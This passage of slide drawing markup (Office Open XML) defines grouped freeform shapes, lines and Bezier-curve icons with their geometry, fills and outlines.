                        <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T9" fmla="*/ 4342 h 434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585" h="4342">
                          <a:moveTo>
                            <a:pt x="12585" y="4342"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="4342"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="C0C0C0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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93" name="Freeform 1761">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA58342-D006-40C4-8CC1-79094A1102C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741" y="3016"/>
                      <a:ext cx="183" cy="49"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 17020"/>
                        <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                        <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                        <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                        <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                        <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                        <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                        <a:gd name="T7" fmla="*/ 0 h 4567"/>
                        <a:gd name="T8" fmla="*/ 0 w 17020"/>
                        <a:gd name="T9" fmla="*/ 1711 h 456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7020" h="4567">
                          <a:moveTo>
                            <a:pt x="0" y="1711"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="10647" y="4567"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="17020" y="2859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="6371" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1711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6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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2067" name="Group 1781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF74D6E9-AFE3-4C96-AFF4-6209CC52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3880" y="1049338"/>
              <a:ext cx="447675" cy="428625"/>
              <a:chOff x="468" y="939"/>
              <a:chExt cx="433" cy="415"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2670" name="Freeform 1782">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BAAB7C-043D-4869-984E-D20BA85A26E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68" y="939"/>
                <a:ext cx="433" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 362 h 1286"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 1286 h 1286"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 924 h 1286"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 0 h 1286"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 362 h 1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1286">
                    <a:moveTo>
                      <a:pt x="0" y="362"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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71" name="Freeform 1783">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132B25DF-4D10-4B50-B865-ABCBCB4805B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706" y="992"/>
                <a:ext cx="155" cy="254"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 482"/>
                  <a:gd name="T1" fmla="*/ 128 h 789"/>
                  <a:gd name="T2" fmla="*/ 0 w 482"/>
                  <a:gd name="T3" fmla="*/ 789 h 789"/>
                  <a:gd name="T4" fmla="*/ 482 w 482"/>
                  <a:gd name="T5" fmla="*/ 662 h 789"/>
                  <a:gd name="T6" fmla="*/ 482 w 482"/>
                  <a:gd name="T7" fmla="*/ 0 h 789"/>
                  <a:gd name="T8" fmla="*/ 0 w 482"/>
                  <a:gd name="T9" fmla="*/ 128 h 7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2" h="789">
                    <a:moveTo>
                      <a:pt x="0" y="128"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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C080C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72" name="Freeform 1784">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98AAAA26-C598-4AC9-98B0-3750D2CA2B4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744" y="1044"/>
                <a:ext cx="78" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 243"/>
                  <a:gd name="T1" fmla="*/ 121 h 121"/>
                  <a:gd name="T2" fmla="*/ 0 w 243"/>
                  <a:gd name="T3" fmla="*/ 64 h 121"/>
                  <a:gd name="T4" fmla="*/ 243 w 243"/>
                  <a:gd name="T5" fmla="*/ 0 h 121"/>
                  <a:gd name="T6" fmla="*/ 243 w 243"/>
                  <a:gd name="T7" fmla="*/ 54 h 121"/>
                  <a:gd name="T8" fmla="*/ 0 w 243"/>
                  <a:gd name="T9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3" h="121">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="54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cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="545554"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/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73" name="Line 1785">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA11116-6127-4774-BC78-9A90BC96D165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 flipV="1">
                <a:off x="612" y="1079"/>
                <a:ext cx="42" cy="1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74" name="Freeform 1786">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D39B0A5-E8B0-4D87-9E06-001E3F7262F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53" y="1072"/>
                <a:ext cx="15" cy="16"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 47 w 47"/>
                  <a:gd name="T3" fmla="*/ 12 h 50"/>
                  <a:gd name="T4" fmla="*/ 0 w 47"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 0 w 47"/>
                  <a:gd name="T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50">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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75" name="Line 1787">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA93CBE3-C323-4CD3-9370-399D5C02CAD5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 flipV="1">
                <a:off x="612" y="1158"/>
                <a:ext cx="42" cy="1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76" name="Freeform 1788">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2B1557-9385-4943-A6EE-CF755BA3B8A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53" y="1149"/>
                <a:ext cx="15" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 47 w 47"/>
                  <a:gd name="T3" fmla="*/ 12 h 50"/>
                  <a:gd name="T4" fmla="*/ 0 w 47"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 0 w 47"/>
                  <a:gd name="T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50">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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77" name="Line 1789">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB066142-B259-4CF2-BAC6-63E11BCBCF21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 flipV="1">
                <a:off x="612" y="1236"/>
                <a:ext cx="42" cy="1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78" name="Freeform 1790">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211931DC-824B-45DF-BB2E-12D3D660C72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53" y="1227"/>
                <a:ext cx="15" cy="16"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 47 w 47"/>
                  <a:gd name="T3" fmla="*/ 12 h 50"/>
                  <a:gd name="T4" fmla="*/ 0 w 47"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 0 w 47"/>
                  <a:gd name="T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50">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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79" name="Freeform 1791">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E83E25-81CB-487E-80A8-082874F07B6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7" y="1237"/>
                <a:ext cx="50" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 46 h 73"/>
                  <a:gd name="T2" fmla="*/ 29 w 66"/>
                  <a:gd name="T3" fmla="*/ 49 h 73"/>
                  <a:gd name="T4" fmla="*/ 10 w 66"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 0 w 66"/>
                  <a:gd name="T7" fmla="*/ 65 h 73"/>
                  <a:gd name="T8" fmla="*/ 3 w 66"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 22 w 66"/>
                  <a:gd name="T11" fmla="*/ 44 h 73"/>
                  <a:gd name="T12" fmla="*/ 24 w 66"/>
                  <a:gd name="T13" fmla="*/ 40 h 73"/>
                  <a:gd name="T14" fmla="*/ 22 w 66"/>
                  <a:gd name="T15" fmla="*/ 38 h 73"/>
                  <a:gd name="T16" fmla="*/ 10 w 66"/>
                  <a:gd name="T17" fmla="*/ 17 h 73"/>
                  <a:gd name="T18" fmla="*/ 17 w 66"/>
                  <a:gd name="T19" fmla="*/ 3 h 73"/>
                  <a:gd name="T20" fmla="*/ 29 w 66"/>
                  <a:gd name="T21" fmla="*/ 28 h 73"/>
                  <a:gd name="T22" fmla="*/ 30 w 66"/>
                  <a:gd name="T23" fmla="*/ 30 h 73"/>
                  <a:gd name="T24" fmla="*/ 33 w 66"/>
                  <a:gd name="T25" fmla="*/ 25 h 73"/>
                  <a:gd name="T26" fmla="*/ 54 w 66"/>
                  <a:gd name="T27" fmla="*/ 1 h 73"/>
                  <a:gd name="T28" fmla="*/ 61 w 66"/>
                  <a:gd name="T29" fmla="*/ 4 h 73"/>
                  <a:gd name="T30" fmla="*/ 62 w 66"/>
                  <a:gd name="T31" fmla="*/ 5 h 73"/>
                  <a:gd name="T32" fmla="*/ 39 w 66"/>
                  <a:gd name="T33" fmla="*/ 32 h 73"/>
                  <a:gd name="T34" fmla="*/ 37 w 66"/>
                  <a:gd name="T35" fmla="*/ 36 h 73"/>
                  <a:gd name="T36" fmla="*/ 39 w 66"/>
                  <a:gd name="T37" fmla="*/ 38 h 73"/>
                  <a:gd name="T38" fmla="*/ 61 w 66"/>
                  <a:gd name="T39" fmla="*/ 46 h 73"/>
                  <a:gd name="T40" fmla="*/ 66 w 66"/>
                  <a:gd name="T41" fmla="*/ 44 h 73"/>
                  <a:gd name="T42" fmla="*/ 61 w 66"/>
                  <a:gd name="T43" fmla="*/ 55 h 73"/>
                  <a:gd name="T44" fmla="*/ 55 w 66"/>
                  <a:gd name="T45" fmla="*/ 60 h 73"/>
                  <a:gd name="T46" fmla="*/ 33 w 66"/>
                  <a:gd name="T47" fmla="*/ 49 h 73"/>
                  <a:gd name="T48" fmla="*/ 30 w 66"/>
                  <a:gd name="T49" fmla="*/ 46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" h="73">
                    <a:moveTo>
                      <a:pt x="30" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="49"/>
                      <a:pt x="29" y="49"/>
                      <a:pt x="29" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="63"/>
                      <a:pt x="14" y="71"/>
                      <a:pt x="10" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="73"/>
                      <a:pt x="3" y="71"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="65"/>
                      <a:pt x="2" y="65"/>
                      <a:pt x="3" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="63"/>
                      <a:pt x="14" y="57"/>
                      <a:pt x="22" y="44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14" y="29"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="10" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="14"/>
                      <a:pt x="12" y="9"/>
                      <a:pt x="17" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="12"/>
                      <a:pt x="23" y="21"/>
                      <a:pt x="29" y="28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42" y="10"/>
                      <a:pt x="49" y="2"/>
                      <a:pt x="54" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="0"/>
                      <a:pt x="59" y="1"/>
                      <a:pt x="61" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="4"/>
                      <a:pt x="62" y="4"/>
                      <a:pt x="62" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="10"/>
                      <a:pt x="48" y="19"/>
                      <a:pt x="39" y="32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47" y="45"/>
                      <a:pt x="54" y="48"/>
                      <a:pt x="61" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="46"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="50"/>
                      <a:pt x="62" y="54"/>
                      <a:pt x="61" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="57" y="59"/>
                      <a:pt x="55" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="61"/>
                      <a:pt x="42" y="57"/>
                      <a:pt x="33" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="46"/>
                      <a:pt x="30" y="46"/>
                      <a:pt x="30" y="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80" name="Freeform 1792">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18639DA-25E7-4212-8261-A2312A00969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7" y="1153"/>
                <a:ext cx="50" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 79"/>
                  <a:gd name="T2" fmla="*/ 65 w 65"/>
                  <a:gd name="T3" fmla="*/ 2 h 79"/>
                  <a:gd name="T4" fmla="*/ 43 w 65"/>
                  <a:gd name="T5" fmla="*/ 33 h 79"/>
                  <a:gd name="T6" fmla="*/ 24 w 65"/>
                  <a:gd name="T7" fmla="*/ 70 h 79"/>
                  <a:gd name="T8" fmla="*/ 20 w 65"/>
                  <a:gd name="T9" fmla="*/ 73 h 79"/>
                  <a:gd name="T10" fmla="*/ 14 w 65"/>
                  <a:gd name="T11" fmla="*/ 79 h 79"/>
                  <a:gd name="T12" fmla="*/ 12 w 65"/>
                  <a:gd name="T13" fmla="*/ 72 h 79"/>
                  <a:gd name="T14" fmla="*/ 10 w 65"/>
                  <a:gd name="T15" fmla="*/ 69 h 79"/>
                  <a:gd name="T16" fmla="*/ 5 w 65"/>
                  <a:gd name="T17" fmla="*/ 60 h 79"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 58 h 79"/>
                  <a:gd name="T20" fmla="*/ 9 w 65"/>
                  <a:gd name="T21" fmla="*/ 49 h 79"/>
                  <a:gd name="T22" fmla="*/ 17 w 65"/>
                  <a:gd name="T23" fmla="*/ 58 h 79"/>
                  <a:gd name="T24" fmla="*/ 19 w 65"/>
                  <a:gd name="T25" fmla="*/ 60 h 79"/>
                  <a:gd name="T26" fmla="*/ 39 w 65"/>
                  <a:gd name="T27" fmla="*/ 28 h 79"/>
                  <a:gd name="T28" fmla="*/ 63 w 65"/>
                  <a:gd name="T2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5" h="79">
                    <a:moveTo>
                      <a:pt x="63" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="2"/>
                      <a:pt x="65" y="2"/>
                      <a:pt x="65" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="9"/>
                      <a:pt x="51" y="20"/>
                      <a:pt x="43" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="46"/>
                      <a:pt x="28" y="58"/>
                      <a:pt x="24" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="73"/>
                      <a:pt x="20" y="73"/>
                      <a:pt x="20" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="76"/>
                      <a:pt x="16" y="78"/>
                      <a:pt x="14" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="78"/>
                      <a:pt x="13" y="76"/>
                      <a:pt x="12" y="72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9" y="65"/>
                      <a:pt x="7" y="62"/>
                      <a:pt x="5" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="58"/>
                      <a:pt x="2" y="57"/>
                      <a:pt x="0" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="53"/>
                      <a:pt x="6" y="50"/>
                      <a:pt x="9" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="49"/>
                      <a:pt x="14" y="51"/>
                      <a:pt x="17" y="58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24" y="50"/>
                      <a:pt x="31" y="39"/>
                      <a:pt x="39" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="16"/>
                      <a:pt x="56" y="7"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo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81" name="Freeform 1793">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E392CC-9DD0-49C4-AFEA-678BE03B46E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7" y="1076"/>
                <a:ext cx="50" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 78"/>
                  <a:gd name="T2" fmla="*/ 65 w 65"/>
                  <a:gd name="T3" fmla="*/ 2 h 78"/>
                  <a:gd name="T4" fmla="*/ 43 w 65"/>
                  <a:gd name="T5" fmla="*/ 33 h 78"/>
                  <a:gd name="T6" fmla="*/ 24 w 65"/>
                  <a:gd name="T7" fmla="*/ 69 h 78"/>
                  <a:gd name="T8" fmla="*/ 20 w 65"/>
                  <a:gd name="T9" fmla="*/ 72 h 78"/>
                  <a:gd name="T10" fmla="*/ 14 w 65"/>
                  <a:gd name="T11" fmla="*/ 78 h 78"/>
                  <a:gd name="T12" fmla="*/ 12 w 65"/>
                  <a:gd name="T13" fmla="*/ 72 h 78"/>
                  <a:gd name="T14" fmla="*/ 10 w 65"/>
                  <a:gd name="T15" fmla="*/ 69 h 78"/>
                  <a:gd name="T16" fmla="*/ 5 w 65"/>
                  <a:gd name="T17" fmla="*/ 60 h 78"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 57 h 78"/>
                  <a:gd name="T20" fmla="*/ 9 w 65"/>
                  <a:gd name="T21" fmla="*/ 49 h 78"/>
                  <a:gd name="T22" fmla="*/ 17 w 65"/>
                  <a:gd name="T23" fmla="*/ 57 h 78"/>
                  <a:gd name="T24" fmla="*/ 19 w 65"/>
                  <a:gd name="T25" fmla="*/ 60 h 78"/>
                  <a:gd name="T26" fmla="*/ 39 w 65"/>
                  <a:gd name="T27" fmla="*/ 27 h 78"/>
                  <a:gd name="T28" fmla="*/ 63 w 65"/>
                  <a:gd name="T29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5" h="78">
                    <a:moveTo>
                      <a:pt x="63" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="2"/>
                      <a:pt x="65" y="2"/>
                      <a:pt x="65" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="9"/>
                      <a:pt x="51" y="19"/>
                      <a:pt x="43" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="46"/>
                      <a:pt x="28" y="58"/>
                      <a:pt x="24" y="69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17" y="75"/>
                      <a:pt x="16" y="77"/>
                      <a:pt x="14" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="77"/>
                      <a:pt x="13" y="75"/>
                      <a:pt x="12" y="72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8" y="64"/>
                      <a:pt x="7" y="62"/>
                      <a:pt x="5" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="58"/>
                      <a:pt x="2" y="57"/>
                      <a:pt x="0" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="52"/>
                      <a:pt x="6" y="49"/>
                      <a:pt x="9" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="48"/>
                      <a:pt x="14" y="51"/>
                      <a:pt x="17" y="57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24" y="49"/>
                      <a:pt x="31" y="38"/>
                      <a:pt x="39" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="16"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo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068" name="Group 2228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30EB41B-4A2F-4C1F-9137-E3AE7B9E3A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2255" y="1958975"/>
              <a:ext cx="642937" cy="193675"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2665" name="Freeform 2229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F43B36-8AEE-4BFA-A5D2-9A6DF34A2A5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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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66" name="Freeform 2230">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FD4C4C-A5BC-4139-BB8A-C5F7073757C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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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67" name="Freeform 2231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92ACB815-6BF8-4AB5-AD3A-9E46C56BF1B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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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68" name="Freeform 2232">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
